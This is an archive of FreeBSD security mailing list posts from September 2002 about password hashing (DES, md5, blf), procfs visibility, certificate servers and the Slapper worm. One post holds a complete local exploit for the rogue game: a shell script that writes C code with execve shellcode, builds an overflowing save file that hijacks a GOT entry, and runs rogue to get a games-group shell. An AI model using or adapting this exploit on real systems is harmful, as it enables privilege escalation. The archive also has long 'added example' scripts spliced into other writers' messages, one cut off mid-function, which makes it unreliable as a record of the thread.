> > How the salt is used will depend upon the algorithm for the hash. For > best results, specify at least two characters of salt. > > The crypt_get_format() function returns a constant string that represents > the name of the algorithm currently used. Valid values are `des', `blf' > and `md5'. > > The crypt_set_format() function sets the default encoding format accord- > ing to the supplied string. > > The global default format can be set using the /etc/auth.conf file using > the `crypt_format' property. Interestingly (perhaps) on a 4.5 RELEASE box, man 3 crypt includes the section above as is, except for the very last line which instead says: the crypt_default property. Which was also as commented out in the 4.5-R /etc/auth.conf. So I added # crypt_default = md5 des crypt_default = md5 and now get md5 passwds as desired when using adduser, which had earlier created DES passwds - and someone else suggested was broken re this? I gather that this property was since renamed, as above, for 4.6? Cheers, Ian > greets jw > > ps. man : (man auth.conf) && man 3 crypt && man 3 auth_getval(!!) > > On Thu, Sep 26, 2002 at 09:55:50AM +0000, Olafur Osvaldsson wrote: [..] > > Dmitry, > > You should be able to set it in /etc/auth.conf, but that doesn't work for me. > > > > You can instead run crypt_set_format("md5") to set the default for your prog > > to md5 or blf for blowfish. > > > > You could also make sure that your salts start with $$ wich would then > > set the algorithm used in encryption, more info on this in the crypt(3) manpage. > > > > /Oli > > > > On Thu, 26 Sep 2002, Dmitry Agafonov wrote: > > > > > Ok, how about more common question. How do I ask system crypt() to use MD5 > > > by default? /etc/make.conf or such? > > > > > > -- > > > Dmitry > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > -- > > Olafur Osvaldsson > > Systems Administrator > > Internet a Islandi hf. 
> > Tel: +354 525-5291
> > Email: oli@isnic.is
[..]

From owner-freebsd-security Thu Sep 26 11:49:20 2002
Date: Thu, 26 Sep 2002 20:49:11 +0200
From: Nomad
To: Todor Genov
Cc: freebsd-security@freebsd.org
Subject: Re: Password encoding
Message-ID: <20020926184911.GA65102@killer.crypton.pl>
References: <20020925221718.GA63296@killer.crypton.pl> <20020925222645.GJ45330@techometer.net> <20020926100437.A47704@unix.za.net>
In-Reply-To: <20020926100437.A47704@unix.za.net>

Oh, that's nice: I hadn't known about that. Since I do like Blowfish, I thought that there are only two possibilities in Free: crypto or md5.

But the main problem is that passwd_format in my login.conf for the default user (and new users were appended to that class) is and was "md5". But the password encoding for new accounts was "des". When I added the line "auth_default=md5" and changed the passwords for those accounts with passwd, then the encoding format changed to md5.

So: _without my knowledge_ passwords for new accounts were 8 characters long.

On Thu, Sep 26, 2002 at 10:04:37AM +0200, Todor Genov wrote:
> > You're going to want to do 2 things. First, make sure that you have your
> > passwd_format=md5 in your /etc/login.conf (be sure to run cap_mkdb
> > /etc/login.conf after you do so).
>
> FreeBSD has had support for blowfish passwords for quite some time now. Just
> specify passwd_format=blf in login.conf.

-- 
Nomad
[%% If you dance with the devil %%]
[%% you don't change him.       %%]
[%% The devil is the one        %%]
[%% who is changing you.        %%]

From owner-freebsd-security Thu Sep 26 18:10:48 2002
Date: Thu, 26 Sep 2002 21:10:45 -0400
From: Webbie
To: Nomad
Cc: freebsd-security@freebsd.org
Subject: Re: Password encoding
Message-ID: <7082011095.20020926211045@ipfw.org>
In-Reply-To: <20020925221718.GA63296@killer.crypton.pl>
References: <20020925221718.GA63296@killer.crypton.pl>

http://bsdvault.net/sections.php?op=viewarticle&artid=89

Wednesday, September 25, 2002, 6:17:19 PM, you wrote:

N> Hello
N> I've upgraded my FreeBSD to 4.6.2 some time ago. Since that day I added
N> some new accounts to my system. Everything was OK but... But one beautiful
N> day I made a mistake and I wrote a shorter password than the good one.
N> And what happened? The system let me in after successful authorization!!!
N> So I made a small investigation. And what I found: the new auth_default
N> value in my system is DES!!! And my passwords on new accounts are only
N> 8 characters long!!!
N> If you've done the same, check your master.passwd for DES-encoded
N> passwords. Because 8-character passwords without the right password
N> policy (with short passwords in mind) are VERY easy to break. I know,
N> I don't have to say that on this list, but writing about fundamental
N> things is never off.
N> So, if I am alone with this problem: I am sorry, I must have made some
N> mistake.
N> But if not: so, I think that we have to do something with this...
N> I upgraded my FreeBSD by buildworld/installworld from sources.
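The following is an added example (editor's code, not part of Nomad's or Webbie's messages) of the master.passwd check Nomad suggests above. It classifies each entry's password field by its prefix: "$1$" is md5, "$2a$" (or "$2b$" on newer systems) is Blowfish ("blf"), a bare 13-character string from [./0-9A-Za-z] is traditional DES crypt(3), which only looks at the first 8 characters of the password, and "*" or "*LOCKED*..." means the account cannot log in with a password. It then lists the accounts still on DES. The sample file it writes is constructed for the demonstration; the user names and hash strings are made up and do not come from any real system.

```shell
#!/bin/sh
# Added example: audit a master.passwd-style file for DES-hashed passwords.
# DES crypt(3) hashes are 13 characters from [./0-9A-Za-z] with no '$' prefix
# and use only the first 8 characters of the password; md5 hashes start with
# "$1$" and Blowfish ("blf") hashes with "$2a$" (or "$2b$" on newer systems).

# Print the format of one password-field string: md5, blf, des, disabled or unknown.
hash_format() {
    h=$1
    case "$h" in
        '$1$'*)            echo md5 ;;
        '$2a$'*|'$2b$'*)   echo blf ;;
        ''|'*'*)           echo disabled ;;   # empty, "*" or "*LOCKED*..."
        *)
            if [ "${#h}" -eq 13 ] && [ "$(printf '%s' "$h" | tr -d './0-9A-Za-z')" = "" ]; then
                echo des
            else
                echo unknown
            fi ;;
    esac
}

# Print "user<TAB>format" for every entry in a master.passwd-style file.
# Field layout: name:password:uid:gid:class:change:expire:gecos:home:shell
audit_passwd_file() {
    while IFS=: read -r name pw _rest; do
        case "$name" in ''|'#'*) continue ;; esac   # skip blank and comment lines
        printf '%s\t%s\n' "$name" "$(hash_format "$pw")"
    done < "$1"
}

# Print only the accounts whose password is DES-hashed, one per line.
des_users() {
    audit_passwd_file "$1" | awk -F '\t' '$2 == "des" { print $1 }'
}

# Write a constructed sample file (every hash below is made up for the demo).
write_sample() {
    cat > "$1" <<'EOF'
# constructed sample, not a real master.passwd
root:*:0:0::0:0:Charlie &:/root:/bin/csh
alice:$1$saltsalt$0123456789abcdefghijkl:1001:1001::0:0:Alice:/home/alice:/bin/sh
bob:ab1Xk9mZq2Lw.:1002:1002::0:0:Bob:/home/bob:/bin/sh
carol:$2a$04$abcdefghijklmnopqrstuuABCDEFGHIJKLMNOPQRSTUVWXYZ012345678:1003:1003::0:0:Carol:/home/carol:/bin/sh
dave:zZ9yX8wV7uT6s:1004:1004::0:0:Dave:/home/dave:/bin/sh
eve:*LOCKED*$1$saltsalt$0123456789abcdefghijkl:1005:1005::0:0:Eve:/home/eve:/bin/sh
EOF
}

# Stand-alone run: audit the file named as $1 (e.g. /etc/master.passwd),
# or the constructed sample when no file is given.
file=${1:-}
cleanup=
if [ -z "$file" ]; then
    file=$(mktemp) || exit 1
    write_sample "$file"
    cleanup=$file
fi
audit_passwd_file "$file"
printf 'DES-hashed accounts: %s\n' "$(des_users "$file" | tr '\n' ' ')"
if [ -n "$cleanup" ]; then rm -f "$cleanup"; fi
```

Run it as root with `sh audit.sh /etc/master.passwd` to see which accounts need a password change after the login.conf fix; a locked entry keeps its original hash behind the "*LOCKED*" prefix, so it is reported as disabled rather than by the underlying algorithm.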
-- 
Webbie
       \\|//
       (o o)
+-------------------------oOOo-(_)-oOOo-----------------------------+
EMail : mailto:webbie(at)ipfw(dot)org
PGP Key : http://www.ipfw.org/pgpkey.txt
PGP Fingerprint: 1379 3D8A 024E 3C0E 1962 4E12 3742 0684 C29C 3537
+-------------------------------------------------------------------+
Out of cards on drive D:

From owner-freebsd-security Thu Sep 26 19:32:40 2002
Date: Thu, 26 Sep 2002 19:28:53 -0700
From: Kevin Steves
To: Peter Jeremy
Cc: freebsd-security@freebsd.org, stevesk@pobox.com
Subject: Re: IPSec/XAuth
Message-ID: <20020927022853.GD1654@jenny.crlsca.adelphia.net>
In-Reply-To: <20020916064426.GA14444@gsmx07.alcatel.com.au>

On Mon, Sep 16, 2002 at 04:44:26PM +1000, Peter Jeremy wrote:
> Is anyone working on an XAuth implementation for IPSec?
> For background information on XAuth, have a look at
> http://www.nwfusion.com/news/tech/2000/0828tech.html
> (This is nothing to do with X11 xauth).

Someone had code for freeswan (responder-only, I think), but I don't know the latest news. Check their list archives.

From owner-freebsd-security Fri Sep 27 2:59:40 2002
Date: Fri, 27 Sep 2002 12:42:10 +0300
From: "Ivailo Tanusheff"
To: "FreeBSD Questions", "FreeBSD Security", "FreeBSD Net"
Subject: PKI
Message-ID: <02f001c2660a$26e197e0$faf810ac@sof.procreditbank.bg>

Hello,

Do you know if there is any Certificate server available for FreeBSD? I need to issue certificates to our customers.

Thank you in advance,
Ivailo Tanusheff

From owner-freebsd-security Fri Sep 27 3: 4:38 2002
Date: Fri, 27 Sep 2002 04:04:31 -0600 (MDT)
From: Dave
To: freebsd-security@FreeBSD.org
Subject: Apache Worm
In-Reply-To: <20020926095550.GB10763@isnic.is>
Message-ID: <20020927040135.J99146-100000@liveson.bsd.st>

Hi, I have noticed tons of people are getting that new Apache worm (mostly the Red-Hat Linux crowd?). Just wondering if anybody has seen a good link for more info on it. Anybody have a nice script to auto-notify these people?

From owner-freebsd-security Fri Sep 27 3:36:12 2002
Date: Fri, 27 Sep 2002 03:36:08 -0700 (PDT)
From: Muhammad Faisal Rauf Danka
To: freebsd-security@FreeBSD.org
Subject: Re: Apache Worm
Reply-To: mfrd@attitudex.com
Message-Id: <20020927103608.66BD83B42@sitemail.everyone.net>

for info:

http://www.cert.org/advisories/CA-2002-27.html
http://www.symantec.com/avcenter/venc/data/linux.slapper.worm.html
http://securityresponse.symantec.com/avcenter/security/Content/2002.09.13.html

Not sure about any auto-notification scripts though, but the latest version of chkrootkit detects it. (www.chkrootkit.org)

b0feebea67655daa440da92099dd5187 chkrootkit.tar.gz

Regards
--------
Muhammad Faisal Rauf Danka
Head of GemSEC / Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Key Id: 0x784B0202
Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 784B 0202

--- Dave wrote:
> Hi, I have noticed tons of people are getting that new Apache worm (mostly
> the Red-Hat Linux crowd?) Just wondering if anybody has seen a good
> link for more info on it. Anybody have a nice script to auto notify these
> people?

From owner-freebsd-security Fri Sep 27 3:55:17 2002
Date: Fri, 27 Sep 2002 14:55:12 +0400
From: "Sergey A. Osokin"
To: Ivailo Tanusheff
Cc: freebsd-security@freebsd.org
Subject: Re: PKI
Message-ID: <20020927105512.GB71352@freebsd.org.ru>
References: <02f001c2660a$26e197e0$faf810ac@sof.procreditbank.bg>
In-Reply-To: <02f001c2660a$26e197e0$faf810ac@sof.procreditbank.bg>

On Fri, Sep 27, 2002 at 12:42:10PM +0300, Ivailo Tanusheff wrote:
>
> Do you know if there is any Certificate server available for FreeBSD? I
> need to issue certificates to our customers.

Sorry, but a certificate for what? "Must be used in a government/military organisation"? :-)

-- 
Rgdz,                        /"\  ASCII RIBBON CAMPAIGN
Sergey Osokin aka oZZ,       \ /  AGAINST HTML MAIL
http://ozz.pp.ru/             X   AND NEWS
                             / \

From owner-freebsd-security Fri Sep 27 4:32:18 2002
Date: Fri, 27 Sep 2002 13:32:00 +0200
From: Nomad
To: freebsd-security@freebsd.org
Subject: kern.ps_showallprocs and procfs
Message-ID: <20020927113200.GB71234@killer.crypton.pl>

Hello

Our FreeBSD has the nice possibility of hiding process information of other users just by setting kern.ps_showallprocs=0. But there is one bad thing about it. What are we using it for, when anybody can read all the information from the /proc filesystem? And, as everybody knows, this filesystem contains information on ALL processes in the system. So I was trying to protect this information by permission manipulations, but without positive results. The only workaround is to unmount /proc and hash it out in /etc/fstab, but I think it's not a good idea to resolve this only in that way. If somebody has some good solution to this problem: I'm ready to read about it.

I'm working on FreeBSD 4.6.2-RELEASE and 4.7-RC.

-- 
Nomad
[%% When you dance with the devil %%]
[%% the devil doesn't change.     %%]
[%% The devil changes you.        %%]

From owner-freebsd-security Fri Sep 27 5:55:15 2002
Date: Fri, 27 Sep 2002 06:54:08 -0600
From: Duncan Campbell
Message-Id: <200209271254.GAA18796@tagish.taiga.ca>
To: freebsd-security@FreeBSD.ORG, mailman@crypton.pl
Subject: Re: kern.ps_showallprocs and procfs

I tend to regard procfs as something of a debugging tool. If you limit it as is probably necessary to do what you suggest, its value as a tool becomes degraded.

Duihb

From owner-freebsd-security Fri Sep 27 6:14: 2 2002
Date: Fri, 27 Sep 2002 07:15:35 -0600
From: "Duncan Patton a Campbell is Dhu"
To: Duncan Campbell, freebsd-security@FreeBSD.ORG, mailman@crypton.pl
Subject: Re: kern.ps_showallprocs and procfs
Message-Id: <20020927131535.M11061@babayaga.neotext.ca>
In-Reply-To: <200209271254.GAA18796@tagish.taiga.ca>
References: <200209271254.GAA18796@tagish.taiga.ca>

I should have added also that this is an antique debate ;-)

> I tend to regard procfs as something of a debugging
> tool. If you limit it as is probably necessary to
> do what you suggest, its value as a tool becomes degraded.
>
> Duihb

Duncan Patton a Campbell is Duihb

From owner-freebsd-security Fri Sep 27 6:16:32 2002
Date: Fri, 27 Sep 2002 14:12:35 +0100
From: Bruce M Simpson
To: Ivailo Tanusheff
Cc: FreeBSD Questions, FreeBSD Security, FreeBSD Net
Subject: Re: PKI
Message-ID: <20020927131234.GE26352@spc.org>
References: <02f001c2660a$26e197e0$faf810ac@sof.procreditbank.bg>
In-Reply-To: <02f001c2660a$26e197e0$faf810ac@sof.procreditbank.bg>

I'm working on a port of OpenCA which is almost ready. Hopefully within the next week (I'm ill at the moment.) :(

www.openca.org

BMS

On Fri, Sep 27, 2002 at 12:42:10PM +0300, Ivailo Tanusheff wrote:
> Do you know if there is any Certificate server available for FreeBSD? I
> need to issue certificates to our customers.
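The following is an added example (editor's code, not from any message in this thread, and not OpenCA) of the openssl-only route to the local CA Ivailo asks for: it creates a self-signed root, signs a per-customer end-entity certificate from a CSR, and verifies the result against the root, so that a certificate issued by any other CA is rejected. It assumes only the openssl(1) command-line tool (1.1.1 or 3.x) with its stock openssl.cnf; the CA name and the customer names are made up for the demonstration.

```shell
#!/bin/sh
# Added example: a minimal local CA using only the openssl(1) command line.
# Assumes openssl 1.1.1 or 3.x with its default openssl.cnf; names are made up.

# Create the CA: private key plus a self-signed root certificate.
# "req -x509" marks the certificate as a CA (basicConstraints CA:TRUE) via
# the default v3_ca section of openssl.cnf.
make_ca() {              # make_ca DIR "CA name"
    dir=$1; name=$2
    openssl genrsa -out "$dir/ca.key" 2048 >/dev/null 2>&1 &&
    chmod 600 "$dir/ca.key" &&
    openssl req -new -x509 -key "$dir/ca.key" -out "$dir/ca.crt" \
        -days 3650 -subj "/CN=$name" >/dev/null 2>&1
}

# Issue an end-entity certificate for one customer. The customer's key and
# CSR are generated here for the demo; in practice only the CSR reaches the
# CA and the private key never leaves the customer.
issue_cert() {           # issue_cert DIR customer-name
    dir=$1; cn=$2
    openssl genrsa -out "$dir/$cn.key" 2048 >/dev/null 2>&1 &&
    openssl req -new -key "$dir/$cn.key" -out "$dir/$cn.csr" \
        -subj "/CN=$cn" >/dev/null 2>&1 &&
    openssl x509 -req -in "$dir/$cn.csr" -CA "$dir/ca.crt" -CAkey "$dir/ca.key" \
        -CAcreateserial -days 365 -out "$dir/$cn.crt" >/dev/null 2>&1
}

# Return 0 if CERT chains to the CA in DIR, non-zero otherwise.
verify_cert() {          # verify_cert DIR CERT
    openssl verify -CAfile "$1/ca.crt" "$2" >/dev/null 2>&1
}

# Print the issuer CN of a certificate (works with 1.0-style and 1.1+ output).
cert_issuer() {          # cert_issuer CERT
    openssl x509 -in "$1" -noout -issuer | sed 's/^issuer=.*CN *= *//'
}

# Stand-alone demo: build a CA, issue one customer cert, check that it
# verifies and that a certificate from an unrelated CA does not.
demo() {
    work=$(mktemp -d) || return 1
    mkdir "$work/ca" "$work/other" &&
    make_ca "$work/ca" "Example Local CA" &&
    issue_cert "$work/ca" alice &&
    make_ca "$work/other" "Unrelated CA" &&
    issue_cert "$work/other" mallory || { rm -rf "$work"; return 1; }
    verify_cert "$work/ca" "$work/ca/alice.crt" && echo "alice.crt: OK"
    verify_cert "$work/ca" "$work/other/mallory.crt" || echo "mallory.crt: rejected"
    echo "alice.crt issued by: $(cert_issuer "$work/ca/alice.crt")"
    rm -rf "$work"
}

if [ $# -eq 0 ]; then demo; fi
```

The hard part Fernando alludes to is everything this script leaves out: keeping ca.key offline, tracking issued serials, publishing a CRL and deciding what extensions (key usage, extended key usage) each customer certificate should carry. This is what a CA front end such as OpenCA adds on top of the same openssl primitives.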
From owner-freebsd-security Fri Sep 27 8:30:28 2002
Date: Fri, 27 Sep 2002 17:51:35 +0300
From: "Ivailo Tanusheff"
To: "FreeBSD Security"
Subject: FW: PKI
Message-ID: <033f01c26635$601edb50$faf810ac@sof.procreditbank.bg>

Hi,

No, I mean certificate for digital signing and encryption. I need to issue
such certificates to customers. Something like VeriSign, but for the local
organization.

Ivilo

-----Original Message-----
From: owner-freebsd-questions@FreeBSD.ORG
[mailto:owner-freebsd-questions@FreeBSD.ORG] On Behalf Of Roman V. Mashak
Sent: Friday, September 27, 2002 1:18 PM
To: FreeBSD Questions; FreeBSD Security
Subject: Re: PKI

On Fri, Sep 27, 2002 at 12:42:10PM +0300, Ivailo Tanusheff wrote:
> Do you know if there is any Certificate server available for FreeBSD? I
> need to issue certificates to our customers.
Do you mean SSL related stuff ?

--
Best regards, Roman

From owner-freebsd-security Fri Sep 27 8:51:00 2002
Date: Fri, 27 Sep 2002 12:48:19 -0300 (ART)
From: Fernando Gleiser
To: FreeBSD Security
Subject: Re: FW: PKI
In-Reply-To: <033f01c26635$601edb50$faf810ac@sof.procreditbank.bg>
Message-ID: <20020927124317.P59093-100000@cactus.fi.uba.ar>

On Fri, 27 Sep 2002, Ivailo Tanusheff wrote:
> Hi,
>
> No, I mean certificate for digital signing and encryption. I need to
> issue such certificates to customers. Something like VeriSign, but for
> the local organization.

openssl has all the functionality to build a CA, but it is a bit hard to do
(it works, but I wouldn't call it "simple"). There is an openCA project
(www.openca.org), but I haven't tried it.

Hope this helps.

Fer

> Ivilo
>
> -----Original Message-----
> From: owner-freebsd-questions@FreeBSD.ORG
> [mailto:owner-freebsd-questions@FreeBSD.ORG] On Behalf Of Roman V. Mashak
> Sent: Friday, September 27, 2002 1:18 PM
> To: FreeBSD Questions; FreeBSD Security
> Subject: Re: PKI
>
> On Fri, Sep 27, 2002 at 12:42:10PM +0300, Ivailo Tanusheff wrote:
> > Do you know if there is any Certificate server available for FreeBSD? I
> > need to issue certificates to our customers.
> Do you mean SSL related stuff ?
>
> --
> Best regards, Roman

From owner-freebsd-security Fri Sep 27 9:28:17 2002
Date: Fri, 27 Sep 2002 11:57:06 -0400
From: Adam Lazur
To: freebsd-security@FreeBSD.ORG
Subject: Re: screen question/problem.
Message-ID: <20020927155706.GA59758@drmirage.clustermonkey.org>
In-Reply-To: <20020925123015.Y11323-100000@walter>

Jason Stone (jason-fbsd-security@shalott.net) said:
> > Screen likes to be root so it can do things like update utmp (or wtmp,
> > whichever).
>
> I've been wondering about this for a while - on my personal systems, I've
> always created a group wtmp and made utmp/wtmp/lastlog group wtmp, group
> writable, and screen, xterm, etc, setgid wtmp instead of setuid root.
>
> This seems to me to preserve that portion of the functionality (I know
> that screen also likes to be setuid root for other reasons) while being
> substantially safer than having everything just be setuid root.
>
> Am I missing something? Are there other implications to using a wtmp
> group and setgid binaries? I think that this would be a nice change to
> make to the base system if it's reasonable to do so.

There are issues with setting permissions on your tty. On my FreeBSD 4.5 box
it keeps the default perms root:wheel 666, which is bad. You want it to end
up with youruser:tty 620.

I maintain screen for the Debian project, and we have been shipping screen
setgid utmp for a long time. We avoid the tty perms problem by having default
perms on unix98 tty's that work out okay (though there is a bug on non-devfs
systems atm).

For full functionality, screen must also be setuid root to do multi-user.
This is another permissions setup problem (on the named pipes this time) that
making screen setuid root avoids.

It's on my todo list to fix things so that a setgid utmp screen will work
with multi-user screen "out of the box" in the future.

--
Adam Lazur, Cluster Monkey

From owner-freebsd-security Fri Sep 27 21:27:58 2002
Date: Sat, 28 Sep 2002 00:27:51 -0400
From: Adam Lazur
To: freebsd-security@FreeBSD.ORG
Subject: Re: screen question/problem.
Message-ID: <20020928042751.GF59758@drmirage.clustermonkey.org>
In-Reply-To: <20020927155706.GA59758@drmirage.clustermonkey.org>

Adam Lazur (adam@lazur.org) said:
> I maintain screen for the Debian project, and we have been shipping
> screen setgid utmp for a long time. We avoid the tty perms problem by
> having default perms on unix98 tty's that work out okay (though there is
> a bug on non-devfs systems atm).

Actually, that's incorrect. It looks like it's accomplished via the grantpt
function in glibc.
--
Adam Lazur, Cluster Monkey

From owner-freebsd-security Fri Sep 27 21:31:57 2002
Date: Sat, 28 Sep 2002 06:31:52 +0200
From: Nomad
To: freebsd-security@freebsd.org
Subject: Re: kern.ps_showallprocs and procfs
Message-ID: <20020928043152.GA75495@killer.crypton.pl>
In-Reply-To: <20020927124625.M76190@babayaga.neotext.ca>

Well, if we tend to regard procfs as a debugging tool only, then maybe it
shouldn't be mounted by default on initial installation? Anyway, in Solaris
it works without giving information on others' processes and can still be a
good debugging tool for root.

Antique debate: hehe, maybe, but we are waiting for 4.7 RELEASE and can do
something with that in an easy way (not mounted by default) without spend m
Well: not 'we' because I am not a developer of Free, but it can be done...
I just don't like it when my friend who's using OpenBSD and doesn't have
procfs on by default laughs at me :(

On Fri, Sep 27, 2002 at 06:46:25AM -0600, Duncan Patton a Campbell is Dhu wrote:
> I tend to regard procfs as something of a debugging tool. If you limit
> it as is probably necessary to do what you suggest, its value as a tool
> becomes degraded.

--
Nomad
[%% When you dance with the devil %%]
[%% the devil don't change.       %%]
[%% The devil changes you.        %%]

From owner-freebsd-security Sat Sep 28 7:42:20 2002
Date: Sat, 28 Sep 2002 15:42:39 +0000
From: Jez Hancock
To: freebsd-security@freebsd.org
Subject: Re: kern.ps_showallprocs and procfs
Message-ID: <20020928154239.GA15224@users.munk.nu>
In-Reply-To: <20020927113200.GB71234@killer.crypton.pl>
On Fri, Sep 27, 2002 at 01:32:00PM +0200, Nomad wrote:
> If somebody has some good solution to this problem: I'm ready to read about it.

Start here:
http://marc.theaimsgroup.com/?w=2&r=1&s=kern.ps_showallprocs&q=t

and you should find this:
http://marc.theaimsgroup.com/?t=103044131400003&r=1&w=2

from about a month or so ago.

HTH,
Jez

From owner-freebsd-security Sat Sep 28 11:57:30 2002
Date: Sat, 28 Sep 2002 20:57:18 +0200
From: psj
To: freebsd-security@freebsd.org
Cc: bugtraq@securityfocus.com
Subject: local exploitable overflow in rogue/FreeBSD
Message-ID: <20020928205718.C29783@iserver.sk>

VULNERABLE APPLICATION:
rogue in FreeBSD (tested on 4.6-RELEASE)

ABOUT APPLICATION:
rogue is a fantasy game which is indirectly setgid games

IMPACT:
low/medium

EXPLOITATION:
we can be egid=games, with this we can:
1. edit score files in /var/games
2. use /var/games as a storage directory (typically when we are limited by quota)

SOLUTION:
1. disabling the rogue game via /etc/dm.conf (mad rogueists KILL YOU)
2. fix in the source code

ABOUT BUG:
At first about dm (from the man page):

  Dm is a program used to regulate game playing. Dm expects to be invoked
  with the name of a game that a user wishes to play. This is done by
  creating symbolic links to dm, in the directory /usr/games for all of
  the regulated games. The actual binaries for these games should be
  placed in a ``hidden'' directory, /usr/games/hide, that may only be
  accessed by the dm program. Dm determines if the requested game is
  available and, if so, runs it. The file /etc/dm.conf controls the
  conditions under which games may be run.

/usr/games/dm is of course setgid games.

Other games which don't need the games euid revoke privileges after start.
Games which need the games euid after start open the score file and then
revoke privileges. Rogue doesn't revoke privileges after start; it runs
with egid games.

The vulnerability is in restoring a saved game. There is a function
read_string in the restore function in the save.c file which doesn't check
the size of the variable. We can rewrite an address in the GOT (as in my
attached exploit).
ATTACHMENTS:
instant-rogue-exp.sh - instant exploit to get egid=games

AUTHOR:
stanojr@iserver.sk

ps: sorry, I know, my English is very bad :]

Content-Disposition: attachment; filename="instant-rogue-exp.sh"

#!/bin/sh
echo "ROGUE EXPLOIT FOR FreeBSD/i386 (4.6-RELEASE) AUTHOR: stanojr@iserver.sk"
echo "WARNING:"
echo "This exploit create 4 files: /tmp/sh, ./rogue-exp.c, ./rogue-exp, ./rogue.hsave\n"
echo "Creating rogue-exp.c which create a vulnerable save file"
cat >rogue-exp.c <<_EOF_
#include
#include
/*
 * shellcode exec /tmp/sh because of horrible terminal which
 * mess ncurses and we must fix it
 */
char shellcode[] =
"\x31\xc0\x50\x89\xe2\x68\x70\x2f\x73\x68\x68\x2f\x2f\x74\x6d"
"\x89\xe3\x50\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80";

long xxx();

int main(ac,av)
int ac;
char *av[];
{
    char hunger_str[13475+strlen(shellcode)];
    char tmp[4];
    unsigned long addr=0x08060b38; // address after strcpy in GOT
    FILE *fp;

    if (ac!=2) usage(av[0]);
    memset(tmp,'A',sizeof(tmp)); // only temporary variable
    memset(hunger_str,'A',sizeof(hunger_str)); // our vulnerable variable
    memcpy(hunger_str+13470,&addr,sizeof(addr));
    memcpy(hunger_str+13474,shellcode,sizeof(shellcode)); // we put shellcode after addr
    hunger_str[sizeof(hunger_str)]=0; //we must close string
    if ((fp=fopen(av[1],"w"))==NULL){
        perror("fopen");
    }
    (void) xxx(1);
    r_write(fp, tmp, sizeof(char)); //detect_monster (see save.c)
    r_write(fp, tmp, sizeof(short)); //cur_level (see save.c)
    r_write(fp, tmp, sizeof(short)); //max_level (see save.c)
    write_string(hunger_str, fp); //our vulnerable variable
    fclose(fp);
    return 0;
}

usage(p)
char *p;
{
    printf("usage: %s save\nsave - vulnerable save file\n",p);
    exit(0);
}

// xxx,xxxx,r_write,write_string stolen from rogue and little changed
r_write(fp, buf, n)
FILE *fp;
const char *buf;
int n;
{
    if (fwrite(buf, sizeof(char), n, fp) != n) {
        perror("fwrite");
    }
}

write_string(s, fp)
char *s;
FILE *fp;
{
    short n;

    n = strlen(s) + 1;
    xxxx(s, n);
    r_write(fp, (char *) &n, sizeof(short));
    r_write(fp, s, n);
}

xxxx(buf, n)
char *buf;
short n;
{
    short i;
    unsigned char c;

    for (i = 0; i < n; i++) {
        /* It does not matter if accuracy is lost during this assignment */
        c = (unsigned char) xxx(0);
        buf[i] ^= c;
    }
}

long xxx(st)
char st;
{
    static long f, s;
    long r;

    if (st) {
        f = 37;
        s = 7;
        return(0L);
    }
    r = ((f * s) + 9337) % 8887;
    f = s;
    s = r;
    return(r);
}
_EOF_
echo "Creating /tmp/sh with stty command to fix terminal and then exec /bin/sh command"
cat >/tmp/sh <<_EOF_
#!/bin/sh
stty icanon echo icrnl onlcr oxtabs
echo "!!! BOOOM !!!"
id
exec /bin/sh
_EOF_
echo "cmd: chmod 755 /tmp/sh"
chmod 755 /tmp/sh
echo "cmd: make rogue-exp"
make rogue-exp
echo "Creating vulnerable save file"
echo "cmd: ./rogue-exp rogue.hsave"
./rogue-exp rogue.hsave
echo "Execing rogue with vuln save file"
echo "cmd: rogue rogue.hsave"
rogue rogue.hsave

From owner-freebsd-security Sat Sep 28 12:40:06 2002
Date: Sat, 28 Sep 2002 21:40:01 +0200
From: Nomad
To: Jez Hancock
Cc: freebsd-security@freebsd.org
Subject: Re: kern.ps_showallprocs and procfs
Message-ID: <20020928194001.GC75716@killer.crypton.pl>
In-Reply-To: <20020928154239.GA15224@users.munk.nu>

That is what I need! Thanks!

On Sat, Sep 28, 2002 at 03:42:39PM +0000, Jez Hancock wrote:
> On Fri, Sep 27, 2002 at 01:32:00PM +0200, Nomad wrote:
> > If somebody has some good solution to this problem: I'm ready to read about it.
> Start here:
> http://marc.theaimsgroup.com/?w=2&r=1&s=kern.ps_showallprocs&q=t
>
> and you should find this:
> http://marc.theaimsgroup.com/?t=103044131400003&r=1&w=2
>
> from about a month or so ago.
>
> HTH,
> Jez

--
Nomad
[%% When you dance with the devil %%]
[%% the devil don't change.       %%]
[%% The devil changes you.        %%]
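A defensive illustration of the save-file bug reported in psj's rogue post above, added here and not code from that post or from rogue itself: the posted write_string stores a short length n followed by n keystream-XORed bytes, and the report says the matching read_string trusts n without checking it against the destination buffer. The keystream and on-disk shape below follow the posted code; read_string_unchecked is an assumed reconstruction of the flaw, read_string_checked is the length-validated form, and roundtrip_checked and the 16-byte demo_buf are constructed for the demonstration.

```c
#include <stdio.h>
#include <string.h>
/* Keystream generator in the shape of xxx() from the posted script (which took it
 * from rogue): reseed != 0 resets the state, reseed == 0 returns the next value. */
long rogue_rand(char reseed)
{
    static long f, s;
    long r;
    if (reseed) { f = 37; s = 7; return 0L; }
    r = ((f * s) + 9337) % 8887;
    f = s;
    s = r;
    return r;
}

/* Same on-disk shape as the posted write_string: a short length n that counts
 * the NUL terminator, followed by n bytes each XORed with the keystream. */
void write_string(const char *s, FILE *fp)
{
    short n = (short) (strlen(s) + 1);
    fwrite(&n, sizeof n, 1, fp);
    for (short i = 0; i < n; i++)
        fputc((unsigned char) s[i] ^ (unsigned char) rogue_rand(0), fp);
}

/* Assumed reconstruction of the flaw the post describes (not rogue's source):
 * n comes from the file and is never compared with the destination buffer. */
int read_string_unchecked(char *buf, FILE *fp)
{
    short n;
    if (fread(&n, sizeof n, 1, fp) != 1) return -1;
    if (fread(buf, 1, (size_t) n, fp) != (size_t) n) return -1; /* overflows when n > buffer */
    for (short i = 0; i < n; i++) buf[i] ^= (unsigned char) rogue_rand(0);
    return 0;
}

/* Hardened reader: n is validated against the caller's buffer before any data
 * is read, and the result is always NUL-terminated. */
int read_string_checked(char *buf, size_t bufsz, FILE *fp)
{
    short n;
    if (fread(&n, sizeof n, 1, fp) != 1) return -1;
    if (n <= 0 || (size_t) n > bufsz) return -2;   /* corrupt or oversized length: refuse */
    if (fread(buf, 1, (size_t) n, fp) != (size_t) n) return -1;
    for (short i = 0; i < n; i++) buf[i] ^= (unsigned char) rogue_rand(0);
    buf[n - 1] = '\0';
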